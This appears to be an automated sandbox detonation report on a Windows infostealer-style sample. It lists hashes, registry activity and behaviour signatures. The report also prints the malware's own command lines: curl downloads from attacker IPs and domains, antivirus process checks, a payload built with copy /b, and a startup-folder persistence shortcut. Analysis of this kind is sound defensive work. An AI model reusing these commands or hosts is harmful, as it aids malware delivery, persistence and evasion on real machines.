"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mvosy" "178.215.224.161/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\acrxz" "178.215.224.251/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bwimx" "178.215.224.65/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zqalu" "bnrwinonalolita.com/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\salig" "dionisarnoldcefee.com/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pyxgn" "178.215.224.252/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gbhnc" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\skigw" "178.215.224.161/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mmnzc" "178.215.224.251/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\cnjui" "178.215.224.65/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wfmgw" "bnrwinonalolita.com/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lzvtc" "dionisarnoldcefee.com/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wmknk" "178.215.224.252/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sjngf" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bfarj" "178.215.224.161/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jlmee" "178.215.224.251/v10/ukyh.php?jspo=6"

Network

Country Destination Domain Proto
US 8.8.8.8:53 WYEKIpcBRejRrpSfXIwIdpR.WYEKIpcBRejRrpSfXIwIdpR udp

Files

C:\Users\Admin\AppData\Local\Temp\Tuition

MD5 cec47644f0f51a10cce5656a87673d71
SHA1 b7abebf08227a9860d7300128a9161841a4b191f
SHA256 34f31de17e65a33977c52d925c766af16d01e97ed9dd84f72048f1a9b5cb269e
SHA512 42ead80a00f47d02074b131e9b54037840ce182b963fe0b1a279d6a851fd300dd0be355503308ad489646e52f081fa46f76e76f915e01162b8b061764663c167

C:\Users\Admin\AppData\Local\Temp\Slovenia

MD5 1332165a90a96d564adbea76842051de
SHA1 6a99c791f8a492ecccf5ada0b77be493a61b1bc9
SHA256 e9edb0d724fc9f115572c847bc1d0c63b9a53d577771bd62384ba145ccc8ff36
SHA512 d6f3da7a6d6c1c8d6219a6c1512e693dbc9e06db9906d1a0e50da90971a13efdf26b413a713b46e71583b1878271ab8795e9aecf82a59359b5114248c4ef4bc6

C:\Users\Admin\AppData\Local\Temp\Index

MD5 358194c0c510ff11f8f3d68afe5ea595
SHA1 e801c32a9b1414741a6fb2aec201d979ec927bbf
SHA256 cfb087fd56dd576f4f4db3b0930adf021950b20b65fe4c1527cb9a090e00565b
SHA512 8805cc8cb6eeb466afe5f5bea5baf3eeda3cf6f422cc761239c31656624472637d5d3a5ecfec45f134f620c34a674e8edd8b88ff36647ea4628bfcc7988fac86

C:\Users\Admin\AppData\Local\Temp\Tackle

MD5 a28ef671a2529783f795e0ce242b69a7
SHA1 3605589e946dcac4492b8a7799660ff4f1a323d1
SHA256 9d68a50b8498172bb2607b4652ed522d009e487cb0683c155805ef199274a745
SHA512 b67e45bda8d8733994f0eabeb454c5853ae5e6f06c7c49826b3995f23d2a5909ac0678f7e810dd7c78fbe3c25a46c996e1b55cc2f880aabcb343979b88448aa8

C:\Users\Admin\AppData\Local\Temp\Heather

MD5 5ebe13d4704e614c4e597bed036a2591
SHA1 b6a40f939e04c997482307fb14126e716efafb2b
SHA256 3b65ae5300550700ece120dade16b6a47ceda16b437853eda1d5c4358d990712
SHA512 ee436b9624eb7eed3c4ae94637a9f13e53cd8da340aad4850cd9c8b8a7d98545623579cb34829ffe04904274033ae7f90f2d18f9dc1ecf260294c76cce943c36

C:\Users\Admin\AppData\Local\Temp\Merit

MD5 f8fef0dc6066b6bdae93db3c69368170
SHA1 e4d55d4c83b049968d5a6f4eee6ad9efe86dff79
SHA256 d945301adc544bc59bac06e95326eea938fc0e88a004bc36ab10e2eda222e374
SHA512 274311de8ddabaa6de2ad8f2266a6af3f2e306e488e272e3d6931c2edbc95437cfe0cd0f32e2818bf6daf30872d2ef1e610257f1ec85e20b7c4ba4d78d83a6c4

C:\Users\Admin\AppData\Local\Temp\Events

MD5 67498253ff01bc79ab26bdaa2183b367
SHA1 5c6efd758ab0b450c8a9ecaeb108e9272535a3b3
SHA256 60c91ae2bed2f72dda2ff6cb4deb1367a437df370be43bea1b7fdb58fd43fae8
SHA512 75fd5cf671a177d0c0ff18e2d088b1b6de0ef839cfd5ea410c4cfba65f26e2253983fb0ad7904cd4ba3f012b035a4682cc95ffbc35d96ad84c09ed2fc3cc19e8

C:\Users\Admin\AppData\Local\Temp\Environment

MD5 b6024d20dba6454f8e2df9086438fce7
SHA1 3edb339cc5960a05ab3d1ab615d4152b092ee832
SHA256 a87a9f1aee8317c1f3fd9c69ee65a569944618092cc1f6fbeb467ab2aa73cecf
SHA512 651e002fa45b48d51803fdd13ff379bf29937438df3a4001c7f935643ca1de4b5a2e4a4a376adf1b3c35b00ac1ed0856916b9d048a88a07a4d8bb989c4a62c56

C:\Users\Admin\AppData\Local\Temp\Column

MD5 d05e382bb4f1e9bb4bce6108e318ea6b
SHA1 ae0344388bc8d4e10a93c305c1f80bc60ab7bd7a
SHA256 ccd218caebb98be70e2caf40b17d54510571e48efa475cdce3c2f71581232a51
SHA512 742980e178aa801829c623ab9ff4d494d8555e2ef26542abdaf46b47fcf521ccf8dd7bf248ff98f1104a8fb18606c84bb4ca198df3ee28b96525bccae7a06d80

C:\Users\Admin\AppData\Local\Temp\Law

MD5 a57501ae52b7c24db316a678306f8083
SHA1 3cf2b2942943163781db70f6759153214fcd1c37
SHA256 8ea7d0e706039bd23733e77b84199102bcd4df8ece1e0c63daf55ed29749683c
SHA512 306de902e6f18b1acceb3bbac47b619bcd0f148a04fd634d13c0a9fdf57ec56edd688ffdd56ec6c827897209c3ffeeb362b2acfe9e1f2df348d7982e4c5626fc

C:\Users\Admin\AppData\Local\Temp\Explanation

MD5 773bc1cb8deb9ff09bc892af84ae5681
SHA1 09f815af8eca0c373302204f58b47f591a300b7c
SHA256 f97765bb2d46f5755af315c71afeb50f52f282caee0a19b9f2644946a9308d42
SHA512 e05b77521bf5c51b60a0d7e9cdc8df2c06e3a065dc3afd42d34444484941b934e36e1ce4f80fb7a86d7c1bb8935abed9070672a02a4a3c12e22a17907b0c9223

\Users\Admin\AppData\Local\Temp\226443\Crossword.pif

MD5 78ba0653a340bac5ff152b21a83626cc
SHA1 b12da9cb5d024555405040e65ad89d16ae749502
SHA256 05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7
SHA512 efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317

C:\Users\Admin\AppData\Local\Temp\226443\d

MD5 7e6971c69a6ca7279da0e89b4b388189
SHA1 894fdd50dead4f46ac677ad06d1455943167ae1f
SHA256 1ae9c8851afa317293db0435ea27ad3fa8fda82a08209ee536ec947130e5c98c
SHA512 06296a0878df852fdd54fb31366d09c5c1984e1f6eaea22f1895d40a78d0ff07cf7a90bf1725becc630dbb33906d0764d6f314653c8f965ffdd91310c9699c0b

memory/840-622-0x0000000003540000-0x000000000359A000-memory.dmp

memory/840-624-0x0000000003540000-0x000000000359A000-memory.dmp

memory/840-623-0x0000000003540000-0x000000000359A000-memory.dmp

memory/840-626-0x0000000003540000-0x000000000359A000-memory.dmp

memory/840-625-0x0000000003540000-0x000000000359A000-memory.dmp

memory/840-627-0x0000000003540000-0x000000000359A000-memory.dmp

C:\Users\Admin\AppData\Local\temp\115

MD5 b65e9213dae00101a52d72b56120ff81
SHA1 d52caec94e56a19cca2bcc6e38dc780b1cb90027
SHA256 dfa7c49d13da53cc057bce84a0944d83258bf61671f92b2f7d0d9ee3e3896740
SHA512 09daf8969898babaaaa9ae8959b5345e204a27ff7b84f0bfb696b1e25130a9f659519a040eeaeae74c8c091586e76a6150743b30f419c0b1952c24c6c227584e

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-12 16:39

Reported

2024-11-12 16:42

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

155s

Command Line

C:\Windows\Explorer.EXE

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1208 created 3536 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\Explorer.EXE

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\303482\Either.pif N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\uwu.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url C:\Windows\SysWOW64\cmd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\303482\Either.pif N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A (4 identical entries)

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\BrushSub C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe N/A
File opened for modification C:\Windows\McLol C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe N/A
File opened for modification C:\Windows\SoilOasis C:\Users\Admin\AppData\Local\Temp\uwu.exe N/A
File opened for modification C:\Windows\RebatesPalm C:\Users\Admin\AppData\Local\Temp\uwu.exe N/A
File opened for modification C:\Windows\DouglasWind C:\Users\Admin\AppData\Local\Temp\uwu.exe N/A
File opened for modification C:\Windows\TmpMoon C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe N/A
File opened for modification C:\Windows\NotifiedAaron C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A (3 identical entries)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A (8 identical entries)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A (2 identical entries)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A (9 identical entries)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A (2 identical entries)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\DolphinDumps\azvw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\303482\Either.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A (4 identical entries)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A (11 identical entries)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A (4 identical entries)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A (8 identical entries)

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\Robocopy.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A (64 identical entries)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Robocopy.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Robocopy.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Robocopy.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Robocopy.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\303482\Either.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3544 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\uwu.exe C:\Windows\SysWOW64\cmd.exe (3 identical entries)
PID 1416 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe (3 identical entries)
PID 1416 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe (3 identical entries)
PID 1416 wrote to memory of 436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe (3 identical entries)
PID 1416 wrote to memory of 2272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe (3 identical entries)
PID 1416 wrote to memory of 372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe (3 identical entries)
PID 1416 wrote to memory of 3700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe (3 identical entries)
PID 1416 wrote to memory of 1180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe (3 identical entries)
PID 1416 wrote to memory of 1208 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif (3 identical entries)
PID 1416 wrote to memory of 2516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe (3 identical entries)
PID 1208 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe (3 identical entries)
PID 1208 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe (3 identical entries)
PID 1720 wrote to memory of 4320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe (3 identical entries)
PID 1208 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe (3 identical entries)
PID 1208 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe (3 identical entries)
PID 2824 wrote to memory of 2272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe (3 identical entries)
PID 1208 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe (3 identical entries)
PID 5012 wrote to memory of 2024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe (3 identical entries)
PID 1208 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe (3 identical entries)
PID 1460 wrote to memory of 4932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe (3 identical entries)
PID 1208 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe (3 identical entries)
PID 3432 wrote to memory of 1400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\uwu.exe

"C:\Users\Admin\AppData\Local\Temp\uwu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Tuition Tuition.cmd & Tuition.cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 226443

C:\Windows\SysWOW64\findstr.exe

findstr /V "AthleticsTabletsUserImaging" Slovenia

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Tackle + ..\Heather + ..\Column + ..\Environment + ..\Events + ..\Merit + ..\Law + ..\Explanation d

C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif

Crossword.pif d

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Windows\SysWOW64\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & echo URL="C:\Users\Admin\AppData\Local\SafeNet Solutions Inc\CyberGuard.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\Admin\AppData\Local\temp\699 2>&1

C:\Windows\SysWOW64\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\temp\699 > C:\Users\Admin\AppData\Local\temp\457

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jfhcn" "178.215.224.252/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\jfhcn" "178.215.224.252/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\eofub" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\eofub" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bjpcn" "178.215.224.74/v10/ukyh.php?jspo=5"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\bjpcn" "178.215.224.74/v10/ukyh.php?jspo=5"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ijxif" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\ijxif" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lvlyl" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\lvlyl" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\eaonl" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"

C:\Windows\SysWOW64\curl.exe

